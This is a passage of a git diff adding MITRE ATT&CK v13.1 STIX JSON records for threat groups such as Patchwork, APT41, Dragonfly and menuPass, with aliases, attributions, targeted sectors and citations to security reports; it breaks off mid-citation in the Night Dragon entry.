b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0.json new file mode 100644 index 0000000000000000000000000000000000000000..dfc90e4b3c4326aa6f95dfc55704dc8b38635299 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0.json @@ -0,0 +1,111 @@ +{ + "type": "bundle", + "id": "bundle--d29d6bf6-25d9-47d3-bf5c-80e8648e3881", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:08:20.780Z", + "name": "Patchwork", + "description": "[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)", + "aliases": [ + "Patchwork", + "Hangover Group", + "Dropping Elephant", + "Chinastrats", + "MONSOON", + "Operation Hangover" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.5", + "type": "intrusion-set", + "id": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0", + "created": "2017-05-31T21:32:07.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0040", + "external_id": "G0040" + }, + { + "source_name": "Patchwork", + "description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)" + }, + { + "source_name": "Chinastrats", + "description": "(Citation: Securelist Dropping Elephant)" + }, + { + "source_name": "Dropping Elephant", + "description": "(Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)" + }, + { + "source_name": "Hangover Group", + "description": "[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)" + }, + { + "source_name": "Cymmetria Patchwork", + "description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.", + "url": "https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf" + }, + { + "source_name": "Operation Hangover May 2013", + "description": "Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.", + "url": "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" + }, + { + "source_name": "Symantec Patchwork", + "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.", + "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries" + }, + { + "source_name": "Unit 42 BackConfig May 2020", + "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.", + "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/" + }, + { + "source_name": "Operation Hangover", + "description": "It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)" + }, + { + "source_name": "Securelist Dropping Elephant", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant \u2013 aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.", + "url": "https://securelist.com/the-dropping-elephant-actor/75328/" + }, + { + "source_name": "PaloAlto Patchwork Mar 2018", + "description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + }, + { + "source_name": "Volexity Patchwork June 2018", + "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.", + "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + }, + { + "source_name": "MONSOON", + "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7.json new file mode 100644 index 0000000000000000000000000000000000000000..fdadc60797eb609bbbdce8e83d90819df0fd2595 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--02535f7f-edd3-4265-81df-9a0db5541090", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-23T15:45:58.846Z", + "name": "APT41", + "description": "[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)\n", + "aliases": [ + "APT41", + "Wicked Panda" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "intrusion-set", + "id": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "created": "2019-09-23T13:43:36.945Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0096", + "external_id": "G0096" + }, + { + "source_name": "Wicked Panda", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "APT41", + "description": "(Citation: FireEye APT41 2019)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "FireEye APT41 2019", + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "FireEye APT41 Aug 2019", + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "Group IB APT 41 June 2021", + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "url": "https://www.group-ib.com/blog/colunmtk-apt41/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json new file mode 100644 index 0000000000000000000000000000000000000000..53c2f67202684404f7f94499f73d1e4481bd9056 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1.json @@ -0,0 +1,145 @@ +{ + "type": "bundle", + "id": "bundle--56ccd702-229b-48b8-b977-46e6e50acfdc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:03:28.170Z", + "name": "Dragonfly", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)", + "aliases": [ + "Dragonfly", + "TEMP.Isotope", + "DYMALLOY", + "Berserk Bear", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", + "Energetic Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "created": "2017-05-31T21:32:05.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0035", + "external_id": "G0035" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TEMP.Isotope", + "description": "(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Dragonfly", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Energetic Bear", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "CISA AA20-296A Berserk Bear December 2020", + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + }, + { + "source_name": "DOJ Russia Targeting Critical Infrastructure March 2022", + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "url": "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + }, + { + "source_name": "Dragos DYMALLOY ", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "url": "https://www.dragos.com/threat/dymalloy/" + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Mandiant Ukraine Cyber Threats January 2022", + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "url": "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + }, + { + "source_name": "Secureworks MCMD July 2019", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + }, + { + "source_name": "Secureworks Karagany July 2019", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE\u2019S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Symantec Dragonfly 2.0 October 2017", + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + }, + { + "source_name": "UK GOV FSB Factsheet April 2022", + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", + "url": "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de.json new file mode 100644 index 0000000000000000000000000000000000000000..e1d13b83450446ded797ec6fdb4f36a192fab70e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--be53da41-2b59-4572-9a21-0caa24ad2f1c", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Evilnum" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de", + "type": "intrusion-set", + "created": "2021-01-22T16:46:17.790Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0120", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0120" + }, + { + "source_name": "Evilnum", + "description": "(Citation: ESET EvilNum July 2020)" + }, + { + "source_name": "ESET EvilNum July 2020", + "url": "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "description": "Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021." + } + ], + "modified": "2021-04-27T19:55:58.323Z", + "name": "Evilnum", + "description": "[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27.json new file mode 100644 index 0000000000000000000000000000000000000000..15dda0a2f7531b488a2c3b6c8044e3e0a4012de9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--d6cf9de2-b669-4fc9-883f-cc0d1399dfb9", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Gorgon Group" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--1f21da59-6a13-455b-afd0-d58d0a5a7d27", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0078", + "external_id": "G0078" + }, + { + "source_name": "Gorgon Group", + "description": "(Citation: Unit 42 Gorgon Group Aug 2018)" + }, + { + "source_name": "Unit 42 Gorgon Group Aug 2018", + "description": "Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + } + ], + "modified": "2021-10-12T21:57:25.847Z", + "name": "Gorgon Group", + "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)", + "x_mitre_version": "1.5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f.json new file mode 100644 index 0000000000000000000000000000000000000000..8dba459087fc2fb3b7ae87141cad2b8ff7cc00a0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f.json @@ -0,0 +1,130 @@ +{ + "type": "bundle", + "id": "bundle--602c8a34-63b8-41c2-ad3e-be26b5dd1917", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-23T15:06:31.019Z", + "name": "menuPass", + "description": "[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)\n\n[menuPass](https://attack.mitre.org/groups/G0045) has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)", + "aliases": [ + "menuPass", + "Cicada", + "POTASSIUM", + "Stone Panda", + "APT10", + "Red Apollo", + "CVNX", + "HOGFISH" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington", + "Michael Cox" + ], + "type": "intrusion-set", + "id": "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f", + "created": "2017-05-31T21:32:09.054Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0045", + "external_id": "G0045" + }, + { + "source_name": "HOGFISH", + "description": "(Citation: Accenture Hogfish April 2018)" + }, + { + "source_name": "POTASSIUM", + "description": "(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "Stone Panda", + "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)(Citation: Symantec Cicada November 2020)" + }, + { + "source_name": "APT10", + "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)(Citation: DOJ APT10 Dec 2018)(Citation: Symantec Cicada November 2020)" + }, + { + "source_name": "menuPass", + "description": "(Citation: Palo Alto menuPass Feb 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "Red Apollo", + "description": "(Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "CVNX", + "description": "(Citation: PWC Cloud Hopper April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)" + }, + { + "source_name": "Cicada", + "description": "(Citation: Symantec Cicada November 2020)" + }, + { + "source_name": "Accenture Hogfish April 2018", + "description": "Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.", + "url": "http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf" + }, + { + "source_name": "Crowdstrike CrowdCast Oct 2013", + "description": "Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.", + "url": "https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + }, + { + "source_name": "FireEye APT10 April 2017", + "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + }, + { + "source_name": "FireEye Poison Ivy", + "description": "FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf" + }, + { + "source_name": "FireEye APT10 Sept 2018", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + }, + { + "source_name": "Palo Alto menuPass Feb 2017", + "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/" + }, + { + "source_name": "PWC Cloud Hopper April 2017", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.", + "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" + }, + { + "source_name": "Symantec Cicada November 2020", + "description": "Symantec. (2020, November 17). Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign. Retrieved December 17, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage" + }, + { + "source_name": "DOJ APT10 Dec 2018", + "description": "United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.", + "url": "https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion" + }, + { + "source_name": "District Court of NY APT10 Indictment December 2018", + "description": "US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.", + "url": "https://www.justice.gov/opa/page/file/1122671/download" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json new file mode 100644 index 0000000000000000000000000000000000000000..4f9947d9f87ebacb06567c9b6146ceac0836921b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--ebcd5955-d35a-4012-99a3-56ced6a25a6f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:54:08.611Z", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", + "aliases": [ + "Night Dragon" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.4", + "type": "intrusion-set", + "id": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "created": "2017-05-31T21:31:51.643Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0014", + "external_id": "G0014" + }, + { + "source_name": "Night Dragon", + "description": "(Citation: McAfee Night Dragon)" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and 